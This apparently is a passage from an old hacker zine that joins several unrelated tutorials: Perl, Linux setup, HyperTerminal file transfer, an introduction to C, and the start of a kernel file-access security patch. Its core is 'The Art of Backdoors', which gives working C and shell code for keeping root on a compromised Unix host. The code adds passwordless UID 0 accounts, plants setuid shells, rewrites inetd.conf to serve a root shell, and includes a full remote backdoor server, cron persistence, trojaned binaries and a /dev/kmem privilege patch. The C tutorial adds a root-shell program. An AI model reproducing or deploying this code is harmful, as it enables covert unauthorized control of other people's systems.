OK, that somewhat covers most of the operators we will be using in our
tutorials. I left some out, such as ?:, =~, !~, \, ->, and // because they
will better fit when we discuss their correspondig topics. Play around
with these operators, some can give you unexpected, but kewl results.. for
example.. try using ++ and -- on a scalar that holds the string "aa" or
something similar.
---------------------------------------------------------------------------
Alright, that concludes this volume of the Perl tutorial.. I know its
quite long, but you wont see another one till mid August since Im going on
vacation (wooohooo). Today we covered:
The 3 types of Perl variables
How to set variables
Variable context
Array sizes
keys(), exists(), defined(), and other functions that act on
variables
Special Perl variables
Basic Perl operators
Play around with some of the stuff we talked about and you should know
enough to make simple Perl programs. For example try a line like this
in your code:
$scalar = `/bin/date`;
print "$scalar\n";
(THOSE ARE SINGLE BACK QUOTES)
Perl is a language where EVERYTHING can be done in more than one way, mess
around with what you already know, and you might come up with something
cool.
Laterz,
Darkmo0n
If ya have any suggestions, comments, or source code you want to
contribute, drop me a note at perl@whereipretendtowork.com or talk to me
on irc.
NEXT VOLUME: Conditional statements and Loops.
The Art of Backdoors
=-=+=-=+=-=+=-=+=-=+=-=+=-=+=-=
By Meb
(Meb_@Piratededucation.com)
Http://TriadSecurity.sacone.com/
This article is intended to teach you how to maintain root after you have
gained it. It is defenantly from the hackers perspective, but could also
be viewed at by the Admins perspective, on how to detect these backdoors
and remove them. This article is not comprehensive, because their are so
many ways to leave backdoors i could not possibly cover them all, but i'm
sure it should explain certain methods and techniques for you to use.
You've been trying to get into this box for a couple weeks, you've got
your hands on a an acc but the privs are terrible. The box is known well
around too be very secure, but now you know just how good the admin is.
You've tried everything, imap, nis, suid exploits, bad permissions, race
conditions, but nothing is working. Finally you stumble onto something
which the admin overlooked and are quickly sitting on a root shell. But
what now? How do you keep this accomplishment you've worked so long on?
[Basics]
-1.
You can add a UID 0 account to the passwd file. This is not recommended
because when the admin views the file, it will be increadably obvious that
his box has been compromised, and you will probably lose your root
position. Here's a short c prog i wrote which will add a UID 0 acc to
/etc/passwd.
<++> backdoor/backdoor1.c
#include
main()
{
FILE *fd;
fd=fopen("/etc/passwd","a+");
fprintf(fd,"hax0r::0:0::/root:/bin/sh\n");
}
<-->
In a similar attempt you could enable an abondoned account and change it's
uid to 0 and change the * in the second field. This method would obviosly
be less obtrusive than the first
Leave a suid shell in /tmp. Once the file is run you will have root privs
again, this is everyone favorite but many box's run cronjobs every couple
hours or when they reboot to clean out tmp, also many box's don't allow
suid files to be executed. You can of course remove all these setbacks by
editing /var/spool/cron/crontabs/root and /etc/fstab. Here's a little
program that makes a suid shell called out in /tmp.
<++> backdoor/backdoor2.c
#include
main()
{
system("cp /bin/sh /tmp/out");
system("chown root.root /tmp/out");
system("chmod 4755 /tmp/out");
}
<-->
[Intermediate]
The super-server configuration file is not the first place a adminn will
look, so obviosly is a good place to put a backdoor? But what makes these
backdoors best, is that their remote, so you don't have to have a local
account to regain root. First, some background info: The Internet daemon
(/etc/inetd) listens for connection requests on TCP and UDP ports and
spawns the appropriate program (usally a server) when a connection request
arrives. The format of the /etc/inetd.conf file is simple. Typical lines
look like this:
(1) (2) (3) (4) (5) (6) (7)
ftp stream tcp nowait root /usr/etc/ftpd ftpd
talk dgram udp wait root /usr/etc/ntalkd ntalkd
1: This is the daemon name of the servie that appears in /etc/services.
This tells inetd what to look for in /etc/services to determine which port
it should associate the program name with.
2: This will tell inetd what type of connection to use when the session is
establised . TCP uses streams, and UDP(The connectionless protocol) uses
datagrams.
3: Protocol field, TCP or UDP.
4: This will tell inetd what the importance of the daemon is. A 'wait'
flag indicates that the server will process a connection and make all
subsequent connections wait. 'Nowait' means the server will accept a
connection, spawn a child process to handle the connection, and then go
back to sleep, waiting for further connections.
5: Is the user the daemon is run as.
6: Program to run when a connection arrives.
7: is the actual command (and optional arguments). If the program is
trivial (usally requiring no user interaction) inetd may handle it
internally. This is done with an 'internal' flag in fields (6) and (7).
So, to install a handy backdoor, choose a service that is not used often,
and replace the daemon that would normally handle it with something else.
You could make it spawn a program that adds a UID 0 acc, or creates a suid
shell.
To take over a service like daytime and instead of telling you the time it
would drop you to a suid root shell, try something like this.
Change the line in /etc/indetd.conf that looks like this:
daytime stream tcp nowait root internal
And change it to:
daytime stream tcp nowait /bin/sh sh -i.
Now you've done this, so you decide to go test it out. You try and it
says "Unable to establish conection", whats wrong? Well in order for
these changes to take place you need to restart inetd, you could wait for
the box to reboot, but who's patient? Just do a "killalll -9 inetd" and it
will automatically restart itself.
Another thing you could do was make a fake service and make it spawn a
program which would be more secure, such as password protected, and have
better options, so that you would have the power to modify the system
further remotley without the dificulties of not running off of telnetd.
Here is a program that will bind to any port and wait, it will not give a
prompt, simply put in the password and you will be given a menu of
options. This code was written by theft shortly before he left the scene
so it's might have a few bugs in it as well as some unworking functions.
<++> backdoor/remoteback.c
/* Coders:
Theft
Help from:
Sector9, Halogen
Greets: People: Liquid, AntiSocial, Peak, Grimknight, s0ttle,halogen,
Psionic, g0d, Psionic.
Groups: Ethical Mutiny Crew(EMC), Common Purpose hackers(CPH),
Global Hell(gH), Team Sploit, Hong Kong Danger Duo,
Tg0d, EHAP.
Usage:
Setup:
# gcc -o backhore backhore.c # ./backdoor password &
Run:
Telnet to the host on port 4000. After connected you
Will not be prompted for a password, this way it is less
Obvious, just type the password and press enter, after this
You will be prompted for a command, pick 1-8.
Distributers:
Ethical Mutiny Crew
*/
#include
#include
#include
#include
#include
#include
#include
#include
#define PORT 4000
#define MAXDATASIZE 100
#define BACKLOG 10
#define SA struct sockaddr /* leaner meaner code */
void handle(int);
int
main(int argc, char *argv[])
{
int sockfd, new_fd, sin_size, numbytes, cmd;
char ask[10]="Command: ";
char *bytes, *buf, pass[40];
struct sockaddr_in my_addr;
struct sockaddr_in their_addr;
printf("\n Backhore BETA by Theft\n");
printf(" 1: trojans rc.local\n");
printf(" 2: sends a systemwide message\n");
printf(" 3: binds a root shell on port 2000\n");
printf(" 4: creates suid sh in /tmp\n");
printf(" 5: creates mutiny account uid 0 no passwd\n");
printf(" 6: drops to suid shell\n");
printf(" 7: information on backhore\n");
printf(" 8: contact\n");
if (argc != 2) {
fprintf(stderr,"Usage: %s password\n", argv[0]);
exit(1);
}
strncpy(pass, argv[1], 40);
printf("..using password: %s..\n", pass);
if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
exit(1);
}
my_addr.sin_family = AF_INET;
my_addr.sin_port = htons(PORT);
my_addr.sin_addr.s_addr = INADDR_ANY;
if (bind(sockfd, (SA *)&my_addr, sizeof(SA)) == -1) {
perror("bind");
exit(1);
}
if (listen(sockfd, BACKLOG) == -1) {
perror("listen");
exit(1);
}
sin_size = sizeof(SA);
while(1) { /* main accept() loop */
if ((new_fd = accept(sockfd, (SA *)&their_addr, &sin_size)) == -1) {
perror("accept");
continue;
}
if (!fork()) {
dup2(new_fd, 0);
dup2(new_fd, 1);
dup2(new_fd, 2);
fgets(buf, 40, stdin);
if (!strcmp(buf, pass)) {
printf("%s", ask);
cmd = getchar();
handle(cmd);
}
close(new_fd);
exit(0);
}
close(new_fd);
while(waitpid(-1,NULL,WNOHANG) > 0); /* rape the dying children */
}
}
void
handle(int cmd)
{
FILE *fd;
switch(cmd) {
case '1':
printf("\nBackhore BETA by Theft\n");
printf("theft@cyberspace.org\n");
printf("Trojaning rc.local\n");
fd = fopen("/etc/passwd", "a+");
fprintf(fd, "mutiny::0:0:ethical mutiny crew:/root:/bin/sh");
fclose(fd);
printf("Trojan complete.\n");
break;
case '2':
printf("\nBackhore BETA by Theft\n");
printf("theft@cyberspace.org\n");
printf("Sending systemwide message..\n");
system("wall Box owned via the Ethical Mutiny Crew");
printf("Message sent.\n");
break;
case '3':
printf("\nBackhore BETA by Theft\n");
printf("theft@cyberspace.org\n");
printf("\nAdding inetd backdoor... (-p)\n");
fd = fopen("/etc/services","a+");
fprintf(fd,"backdoor\t2000/tcp\tbackdoor\n");
fd = fopen("/etc/inetd.conf","a+");
fprintf(fd,"backdoor\tstream\ttcp\tnowait\troot\t/bin/sh -i\n");
execl("killall", "-HUP", "inetd", NULL);
printf("\ndone.\n");
printf("telnet to port 2000\n\n");
break;
case '4':
printf("\nBackhore BETA by Theft\n");
printf("theft@cyberspace.org\n");
printf("\nAdding Suid Shell... (-s)\n");
system("cp /bin/sh /tmp/.sh");
system("chmod 4700 /tmp/.sh");
system("chown root:root /tmp/.sh");
printf("\nSuid shell added.\n");
printf("execute /tmp/.sh\n\n");
break;
case '5':
printf("\nBackhore BETA by Theft\n");
printf("theft@cyberspace.org\n");
printf("\nAdding root account... (-u)\n");
fd=fopen("/etc/passwd","a+");
fprintf(fd,"hax0r::0:0::/:/bin/bash\n");
printf("\ndone.\n");
printf("uid 0 and gid 0 account added\n\n");
break;
case '6':
printf("\nBackhore BETA by Theft\n");
printf("theft@cyberspace.org\n");
printf("Executing suid shell..\n");
execl("/bin/sh");
break;
case '7':
printf("\nBackhore BETA by Theft\n");
printf("theft@cyberspace.org\n");
printf("\nInfo... (-i)\n");
printf("\n3 - Adds entries to /etc/services & /etc/inetd.conf giving you\n");
printf("a root shell on port 2000. example: telnet 2000\n\n");
printf("4 - Creates a copy of /bin/sh to /tmp/.sh which, whenever\n");
printf("executed gives you a root shell. example:/tmp/.sh\n\n");
printf("5 - Adds an account with uid and gid 0 to the passwd file.\n");
printf("The login is 'mutiny' and there is no passwd.");
break;
case '8':
printf("\nBackhore BETA by Theft\n");
printf("\nhttp://theft.bored.org\n");
printf("theft@cyberspace.org\n\n");
break;
default:
printf("unknown command: %d\n", cmd);
break;
}
}
<-->
[Advanced]
Crontab is a very powerfull tool for the admin. Cron is used to schedule
jobs to do at certain times of the day, month, or year. Can you see where
this is going? Because of this, you can make a very powerfull backdoor.
With Cron you could make it spawn a program at say 3:00 am in the morning,
when the admin is asleep, so you can quickly get in and do as you like and
get out before he ever notices, it's possibilities are endless. The root
crontab jobs are located in /var/spool/crontab/root and can be manually
edited. The Cron lines will look something like this.
(1) (2) (3) (4) (5) (6)
0 0 * * 3 /usr/bin/updatedb
1. Minute (0-60)
2. Hour (0-23)
3. Day (1-31)
4. Month (1-12)
5. Day (1-7)
6. is the command (or shell script) to execute.
The above shell script is executed on Wednesday. To create a backdoor in
cron just add your custom line to /var/spool/crontab/root. You could make
a program or shell script in the crontab which checked every week of so if
the account we created earlier is still in the /etc/passwd. To start
this, you would add this line to /var/spool/crontab/root:
0 0 * * * /usr/bin/retract
<++> backdoor/backdoor.sh
#!/bin/csh
# Is our account still alive in /etc/passwd? We'll see.
set evilflag = (`grep eviluser /etc/passwd`)
if($#evilflag == 0) then # Is he there?
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
split -$linecount[1] ./temppass # passwd string optional
echo "Meb::0:0:Meb:/root:/bin/sh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
else
endif
<-->
[Complex]
You could of course write a trojan and place it in /bin and make the
program create a suid shell if the right arguments are given. This is a
very good trojan if utilized correctly. You could also replace a little
used program with your trojan in /bin such as dialog to make your trojan
even more stealth. Here's a program which if given the correct agrument
will create a suid shell in /tmp
<++> backdoor/backdoor3.c
#include
#define pass "triad"
#define BUFFERSIZE 6
int main(argc, argv)
int argc;
char *argv[];{
int i=0;
if(argv[1]){
if(!(strcmp(pass,argv[1]))){
system("cp /bin/csh /bin/.swp121");
system("chmod 4755 /bin/.swp121");
system("chown root /bin/.swp121");
system("chmod 4755 /bin/.swp121");
}
}
printf("372f: Invalid control argument, unable to initialize. Retrying");
for(;i<10;i++){
fprintf(stderr,".");
sleep(1);
}
printf("\nAction aborted after 10 attempts.\n");
return(0);
}
<-->
[Diverse]
Because the kernel keeps it's paremeters in memory, it is possible for you
too modify the memory and use it to change you proccess to the UID of 0.
To do this, /dev/kmem must be world readable and writable. The program
below will seek to your page in the memory and change your UID effectively
spawning you a suid root shell.
<++> backdoor/kmemthief.c
#include
#include
#include
#include
#include
#include
#include
#define pass "triad"
struct user userpage;
long address(), userlocation;
int main(argc, argv, envp)
int argc;
char *argv[], *envp[];{
int count, fd;
long where, lseek();
if(argv[1]){
if(!(strcmp(pass,argv[1]))){
fd=(open("/dev/kmem",O_RDWR);
if(fd<0){
printf("Cannot read or write to
/dev/kmem\n");
perror(argv);
exit(10);
}
userlocation=address();
where=(lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(20);
}
count=read(fd,&userpage,sizeof(struct user));
if(count!=sizeof(struct user)){
printf("Cannot read user page\n");
perror(argv);
exit(30);
}
printf("Current UID: %d\n",userpage.u_ruid);
printf("Current GID: %d\n",userpage.g_ruid);
userpage.u_ruid=0;
userpage.u_rgid=0;
where=lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(40);
}
write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));
execle("/bin/csh","/bin/csh","-i",(char *)0, envp);
}
}
}
<-->
[The Clumsy]
Have you ever been pounding away working a problem with your box and
accidently typed "cd.." instead of "cd .." It happens to me because before
linux I used windows and MS-Dos for years, and the commands are still
stuck in my head. Well every now and then, the admin will type that,
wouldn't you want to take advantage of his mistake? What if when he typed
cd.. it would trigger your trojan program? Therefore being a semi remote
backdoor seeing as you don't have to be logged in the box to trigger it,
the truth is, you can! Here's a small program I wrote to take advantage
of human error.
<++> backdoor/dumb.c
/*
This program will add a UID 0 account to /etc/passwd
when the admin accidently types cd..
Also to cover up itself it will perform the cd action
so as the admin would never notice his mistake
*/
#include
#include
main()
{
FILE *fd;
fd=fopen("/etc/passwd","a+");
fprintf(fd,"hax0r::0:0::/root:/bin/sh\n");
system("cd");
}
<-->
Now compile that program and put it somewhere that it looks like it
belongs. It is also a good idea if you are doing this from a suid shell
to change it's ownership by doing "chown root out" if the programs name
was out, changing the group would also be a good idea, whats the reasoning
behind this? Well if the admin deos a "ls -alF" and sees a suid root
program which owner is an unprivileged account, he's going to figure out
it's a backdoor and remove it.
Ok, now that you've compiled the program(lets say it was called out in
/bin) then you would do this command to "link" cd.. and /bin/out together,
do a "ln cd.. /bin/out" and now when the admin makes that vital mistake,
you'll have access to the system once again.
[Closure]
This article was meant to give you a feel for creating, maintaining, and
using backdoors as well as removing them. You may use this information
any way you like, but be still use your judgement on how you use them and
how much it will effect the system and it's performance. For any questions
or comments, please send mail to meb_@piratededucation.com.
Linux SetUp Tutorial by Psionic
=-=+=-=+=-=+=-=+=-=+=-=+=-=+=-=+=-=+=-=
--Copyrighted material--
This document may be freely distributed but not for commecrial use.
Nothing in this docuent may be romved and/or edited.
Author's name must be named in document.
This document may not be flamed.. =P (it is my first doc...)
--
Linux SetUp
The setup of the linux os may differ per distro this tut will have the
basics that will be the same for almost every linux distro.
It will be divided in a couple of really simple steps, this document will
not go into configuration of diff. hardware devices etc.. that may differ
per machine.
Ok the steps will be the following:
1. In case you have no bootdisk, you will have to make one.
In case you DO have a bootdisk WTF ARE YOU DOING IN THIS DOC?
it is so easy if you already have a bootdisk handy..
Ok I hope you have windows running b'c it is very handy for making the
bootdisk (that is the only actual purpose windows has; u can make linux
bootdisks pretty easy)
Ok; if you have the linux os on cd insert the cd into the cd-rom drive.
Otherwise just go to the dir it is in, now insert a formatted floppy disk
into our floppy drive (it may also be inserted into the cd-rom drive, but
i doubt if that will work)
Now select the right image files for the bootup and put them on the
floppy,
if you don't know what files to pick look for a setup text (hehe) or go to
the website, and go to 'how to setup' (hehe again)
2.
When you have found the right files, insert the bootdisk and bootup.
You may have to disable your C:/ drive in your BIOS first b'c some
computers wont read the floppydrive first and they wont boot into the
linux setup.
3. Configure everything, and bootup again and, BEHOLD you have linux
installed.
( i know it looks all very easy but it needs some practice, and you may
want to make a backup of your C:/ drive in case of partitioning etc..)
Ok I think was about it, I hope you learned something by reading this.
Have fun and Good luck :)
Written by Psionic
petersen909@hotmail.com ( yeah this is my lame flame adress)
You can always talk to me at irc.box5.net channel: #wargames.
Cya
Hyperterminal trick
=-=+=-=+=-=+=-=+=-=+=-=+=-=
What's needed
------------------
-- Two computers
-- Two phonelines
-- Windows HyperTerminal
What are we doing?
------------------
We are connecting two computers via a Windows program called "HyperTerminal."
This means you can connect your Windows machine with another even if the other
end isn't running Windows. The Linux equivalent is minicom.
Uses of this.
------------------
This is very useful for transmitting files which are too big to fit on floppy disks, or
if you are transmitting from an incompatible media (IE: From a zip disk to a computer which has
no zip drive). See if you can find other useful tricks. It's very useful to send files to your
friend who aren't on-line, like sending them a patch for a game, etc.
What to do now?
----------------------
This goes about double the speed of a normal download. There is only one problem I have
found with it, and that is sometimes the computers gets de-synced, (meaning one has sent more
than the other can handle and the whole file doesn't get transfered) but that happens very
rarely. Well, lets start up your windows hyperterminal program. Set the number to dial
accordingly. Now, if you dial that's the easy part, but if you are going to answer you will have
to first type the modem init. string which is "ATZ" then you will see *ring* *ring* *ring* and
then type the string to make it answer type "ATA" then let it connect. You can chat with your
friend but it looks shit, but hey, be thankful for what you get. To send a file click the send
file button and use ZMODEM protocol, it's the best. To get a file, just let your bud send it.
It will automatically start downloading. Be careful though, disable call waiting and try not to
step on your phone cords and stuff. This will de-sync it, and that's a bitch when it happens.
When it does de-sync, just abort the send and re-send it, you'll see some weird characters on
the screen but its perfectly fine. Well that's its, short huh? Well I'm out, remember to have
fun now.
~BurntAsh
BurntAsh@juno.com
An introduction to C
=-=+=-=+=-=+=-=+=-=+=-=+=-=
I. Introduction
A) Disclaimer
B) Introduction
C) The Basics of the Basics
II. Technical Nonsense
A) C Keywords
B) The Escape Character
III. Getting Down To The Nitty Gritty
A) Constants, Variables, and Arithmetic Operators
B) Data Types
C) Expressions and Statements
D) The Basics of A Function
IV. Let The Fun Begin
A) Writing Your First Program
B) Using exit() In A Program
C) Using printf() With Operators
V. The Shady Side Of It
A) Making A SUID Backdoor
B) Learning How-To Trojan A SUID
VI. Conclusion
A) Final Words
B) Credits
Introduction
Disclaimer:
I, psylence, the publishers of this text, and anyone else who
gave this to you cannot be held responsible should you choose to use it
for malicious purposes. Remember hackers make things and crackers
break them.
Introduction:
This is intended to be an introduction to C programming for the
Linux operating system, which is just a flavor of Unix. C is a high-
level programming language, which means that it's written with words
like we speak. In order for your computer to understand the program
code it must first be compiled into a binary format. This will not
make you into a C guru or anything, but it should at least get you
started on your way into the world of geeks and nerds. ;)
The Basics:
First let's talk about the structure of a program. Before
anything else you have your header files. So what exactly are header
files you ask? Well the header of a program is basically telling the
program that it needs a certain header (.h) file for at least of one of
the functions in the program to work. A header file contains
preprogrammed functions. If you forget to include stdio.h and use the
printf function it won't work because the header for printf (stdio.h)
wasn't put in the code.
After the header of the program you have the body of the program.
The body contains functions, which contain statement blocks, which
contain statements, which may contain more functions. Cool eh?
At any point in the source code of a program there may be
remarks. The beginning of a remark is identified by a forward slash
then a star (/*) and the end of a remark is identified by a star then a
forward slash (*/).
/* This is a remark, this is only a remark! */
Technical Nonsense
C Keywords:
Keyword Description
auto Storage class specifier
break Statement
case Statement
char Type specifier
const Storage class modifier
continue Statement
default Label
do Statement
double Type specifier
else Statement
enum Type specifier
extern Storage class specifier
float Type specifier
for Statement
goto Statement
if Statement
int Type specifier
long Type specifier
register Storage class specifier
return Statement
short Type specifier
signed Type specifier
sizeof Operator
static Storage class specifier
struct Type specifier
switch Statement
typedef Statement
union Type specifier
unsigned Type specifier
void Type specifier
volatile Storage class modifier
while Statement
The Escape Character (\):
You will definitely see the escape character in C. The \
character is the escape character. When the computer sees the \ it
knows that a "special" character is coming right after it. Here's a
few of the characters that may come after the escape character.
Character Description
\n The new line character; causes a carriage return and a line
feed.
\b The backspace character; moves the cursor to the left on
space.
\r The return character; returns to the beginning of the current
line.
\t The tab character; moves to the tab stop.
\f The form-feed character; goes to the top of a new page.
Getting Down To The Nitty Gritty
Constants, Variables, and Arithmetic Operators:
A constant is a value that *never* changes. Whereas a variable
can be used to represent different values. You can think of a variable
as a floppy, which is constantly having new data written to it and a
constant as a CD that is written one time and isn't ever written over.
Defining a variable is quite simple. x = 24; assigns the value
24 to the variable x. x is the variable and 24 is a constant. You can
also assign a different value to x later if you like. I don't because
I lose track, but if you have the memory for it then more power to you.
:)
Arithmetic Operators are symbols. + - * / % are all arithmetic
operators. You are probably already familiar with some of these. %
was a new one for me. % is used to get the remainder of the first
operand divided by the second operand.
Data Types:
Each variable has a data type. Some basic data types are int,
char, float, and double. int stands for the integer data type, char
stands for the character data type, float stands for the floating point
data type, and double is another way to represent the float data type
except that it uses 10 digits of precision. Each data type has a
format specifier.
The int format specifier can be %d or %i. The char format
specifier is %c. The float or double format specifier if %f. One way
they can be used is in a printf statement. You'll learn more about
expressions and statements in the next section.
Expressions And Statements:
An expression is a combination of constants, variables, and
operators used to denote a computation. In the expression a + 5 = c
the variable a plus the constant 5 equals the variable c.
A statement is a set of instructions ended with a semicolon (;),
usually ended with a semicolon anyhow. There are a few functions which
don't need a semicolon at the end, such as the for function. An
example of a statement is:
printf("I can write in c\n");
A group of statements make up a statement block. A statement
block starts with an opening brace ({) and ends with a closing brace
(}). Here's an example:
{
printf("see the opening brace?\n");
printf("now look at the closing brace.\n");
}
The Basics Of A Function:
Well a function may be prewritten and used simply by including
the header file for that function or you may write the function
yourself. A function is usually in statement form.
printf("printf() is a function!"\n);
As you can see the function is printf(). The basic function
format is the name of the function followed by a pair of left and right
parentheses. Arguments to the function are put in the parentheses.
The argument to the statement above was "printf() is a function!". The
arguments may be different depending on your function, but remember
type 'man function name' at the prompt to bring up the manual on that
function.
Let The Fun Begin
Writing Your First Program:
We are going to write a simple program to print Hello World! to
standard output (your monitor). So open up your favorite editor
(usually pico, emacs, or vi come with Linux). The standard C compilers
are cc or gcc, gcc comes with most distributions of linux. The syntax
is 'gcc file.c -o file'. Make sure that the file with the code has the
.c extension or else it *won't* compile. I'll include the shell
commands just for the inexperienced.
$pico hello.c
<++> basicC/hello.c
/* This program will print Hello World! */
#include
main()
{
printf("Hello World!\n");
return 0;
}
<-->
$gcc hello.c -o hello
Okay that was fun eh? Not really you say?!? Damn you, you
ingrate! Just joking, but I promise I'll get into more fun code later
in the paper) So let's break down this code.
The first thing is the header, #include , which includes
the header file stdio. Stdio stands for STandarD Input Output. The
double angled brackets (<>) around it mean to look for the header file
in a directory other than the current one. If it had double quotes
("") around it then it would mean to look for the header file in the
current directory before looking for it elsewhere.
The next thing, main(), is the main function of the program.
Every C program *must* have a main function. There are only 2
statements inside of the statement block. The printf statement and the
return statement. The return statement returns the value 0 in this
case, which is a true value. Any other (usually 1) would be a false
value. This is usually used to indicate errors in a program.
Using exit() In A Program:
Above you learned the return is used to return a value to the
program. In this example we'll use the exit function instead of the
return statement.
<++> basicC/exit.c
/* This will use the exit function instead of return */
#include
#include
void main()
{
printf("Hello again.\n");
exit(0);
}
<-->
So let's break this down real quick and move on. You have the header,
but wait... what's this? A new header file?!? Yep, because the exit
function uses the header file stdlib. Stdlib stands for STandarD
LIBrary. The void data type means that the function won't return a
value. The "the" statement block for main has 2 statements in it. The
printf statement and the exit statement.
Using printf() With Operators:
So we've seen how to print to standard output. Now let's try out
using putting all the other stuff you learned to use eh? Check out
this example:
<++> basicC/printf.c
#include
main()
{
int y;
y = 2 + 5;
printf(" 2 + 5 = %d\n", y);
return 0;
}
<-->
That one had a bit more meat on it eh? Okay let's break it down.
The only header file is stdio. The main function is there (of course).
Inside of the statement block there are 4 statements. int y, y = 2 +5,
printf, and the return statement. int y; gives the variable y the int
data type. y = 2 + 5 assigns the value of 2 + 5 to the variable y.
The %d in the printf statement means that the %d will be a integer.
The \n means newline. The y after the , in the printf statement means
that the integer value of %d is going to be y. Then the value 0 is
returned to the function.
Now take a look at the character format specifier in a program.
Check out this example:
<++> basicC/printf2.c
#include
main()
{
char c1, c2;
c1 = 'h';
c2 = 'i';
printf("%c%c\n", c1, c2);
return 0;
}
<-->
By this time I bet you probably have the hang of it. So I'll
just breeze over this one. Header, main function, the data type of c1
and c2 is char, the character h is assigned to c1 and i is assigned to
c2. hi is printed to standard output and the value 0 (true) is
returned.
The Shady Side Of It
Making A SUID Backdoor:
Well first off I'll explain what a SUID is. SUID stands for Set
Used ID. A Unix machine identifies each user with a number. The root
UID is 0. Just as with UID there is also a GID, which is your Group
ID. With that in mind let's see a program that'll spawn a rootshell
for you. muhahaha :P
<++> basicC/suid.c
#include
#include
main()
{
setgid(0); setegid(0);
setuid(0); seteuid(0);
printf("Root Be Thy Name\n");
execl("/bin/sh", 0);
return 0;
}
<-->
Okay, okay, now that will give you a root shell if the
permissions on the compiled binary file are set correctly, but I'll
leave that part out so that I won't be harassed by people for teaching
people stuff like that. The setgid, setegid, setuid, and seteuid
functions are used to set the GID, Effective GID, UID, and Effective
UID. The execl function executes the argument ("/bin/sh"). So it made
a shell. You already know that return just returns a value to the
function. To see details check out the manuals yourself ;)
Learning How-To Trojan A SUID:
So you learned briefly about what SUID's are and the functions
that go along with them. Now obviously a root SUID program is slightly
obvious so to further your shady intentions you could get the source to
a SUID that's already on the machine and add in some code to spawn you
a shell. This can be done with as few as 10 lines of additional code.
Conclusion
Final Words:
I know I've left out some stuff and that there's much more to be
said on the subject of C programming, but this was only supposed to be
an introduction. I may write another paper on it, but don't hold your
breath ;) Basically with what you've learned here you can at least get
your math homework done. Or make a nifty backdoor. If you we're
disappointed with this paper I don't really care. :) Please redirect
all flames to /dev/null or /dev/echo. Thanks and have fun!
Credits:
I got to give thanks to mcp.com for the personal bookshelf.
Thanks to Sams for "C In 24 Hours" and "C In 21 Days". Thanks to
everyone who's put up with my questions on the subject. A big thanks
to overdose001 for proof reading this for me.
Greets go out to xphantom, Remmy, all of tg0d, irishrose,
lamagra, GrimKnight, and everyone else.
-=-
Very cool informative zine, unlike so many others especially for a
number one issue, quite impressive - two "Kevin's" up! <sic> - Ed
@HWA
157.0 Paper:Some Extra Security In The Linux Kernel - Auditfile by {}
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Submitted by {}
Some Extra Security In The Linux Kernel - Auditfile
a paper by Frank van Vliet alias {}
karin@root66.nl.eu.org
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
RooT66 http://root66.nl.eu.org
ShellOracle http://www.shelloracle.cjb.net
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
First read:
Kernel Hackers Guide -http://www.linuxhq.com/guides
The Linux Kernel -http://www.linuxhq.com/guides
The Linux Kernel Module Programming Guide -http://www.linuxhq.com/guides
The tarball can be downloaded from http://root66.nl.eu.org/karin/auditfile-0.39.tar.gz
----------[ about me
I'm Frank van Vliet alias {}, networking/security/linuxfreak and leader
of RooT66 (http://root66.nl.eu.org)
You can contact me on karin@root66.nl.eu.org
----------[ introduction
There is no such thing as 100% security, so why act like you are safe
by downloading the latest patches. 'My script automatically downloads
the latest patches and installs them, my box is secure' - right. Why
not flip over and say, every process is insecure. Every process got a
goal, lets give it permission to accomplish that goal and restrict it
as much as possible.
Auditfile is a securitypatch i wrote some time ago giving the
oppertunity to restrict the usage of files per process, so we can say
-Our httpserver can only
read:
/usr/local/apache/conf/*
/usr/local/apache/htdocs*
/usr/local/apache/cgi-bin/*
write:
/usr/local/apache/logs/*
both read and write:
/usr/local/apache/cgi-bin/guestbook_database/*
----------[ how to add those security options
------------------[ task_struct
Every process got its own task_struct in the global array of current
tasks (task_list). This task_struct contains things like filename,
environment, uid, gid, euid, and so on. This seems to be the right place
to add a
char *auditfile; // pointing to memory where rules for auditfile are put
int auditfile_len; // integer telling size of memory used for rules for auditfile
We can find struct task_struct in /usr/src/linux/include/linux/sched.h
so add that char * and that int to the task_struct.
------------------[ How should this memory look like?
I came up with the following map of the memory
Flags:
read = 1
write = 2
both read and write = 3
sprintf(buffer_for_auditfile_rules "\0%c%s\0%c%s\0%c%s\0%c%s.....\0\0", flag, match, flag, match, flag, match, flag, match .....");
Example:
read /usr/bin/*
read /lib/*
read /etc*
both /tmp*
write /tmp/write/*
would look like
\0\1/usr/bin/*\0\1/lib/*\0\1/etc*\0\3/tmp*\0\2/tmp/write/*\0\0
------------------[ how do we get this memory attached to new processes
I wrote a little kernel module that allocates memory, fills it with
rules, and attaches that memory to the
task_struct_of_process_to_edit.auditfile, here it is:
-----[ WARNING ADULT CONTENTS ]-----
#include <linux/kernel.h>
#include <linux/module.h>
#if CONFIG_MODVERSIONS==1
#define MODVERSIONS
#include <linux/modversions.h>
#endif
#include <sys/syscall.h>
#include <linux/sched.h>
#include <linux/malloc.h>
#ifndef KERNEL_VERSION
#define KERNEL_VERSION(a,b,c) (((a) << 16) + ((b) << 8) + (c))
#endif /*KERNEL_VERSION*/
#if LINUX_VERSION_CODE>=KERNEL_VERSION(2,2,0)
#include <asm/uaccess.h>
#endif
int pid=0;
char *command;
char *parm;
char parsedrule[0xFFFF]; // sorry very ugly, but to lazy to fix ((:
char *parsedrulereal;
MODULE_PARM(pid, "i");
MODULE_PARM(command, "s");
MODULE_PARM(parm, "s");
int init_module()
{
int i=0,j=0,h=0;
struct task_struct *p;
read_lock(&tasklist_lock);
for_each_task(p)
{
if ((p->pid)==pid) {
switch (parm[i]) {
case 'r':
parsedrule[j] = 0;
parsedrule[j+1] = 1;
j+=2;
break;
case 'w':
parsedrule[j] = 0;
parsedrule[j+1] = 2;
j+=2;
break;
case 'b':
parsedrule[j] = 0;
parsedrule[j+1] = 3;
j+=2;
break;
}
for (i=1;h!=1;i++) {
switch (parm[i]) {
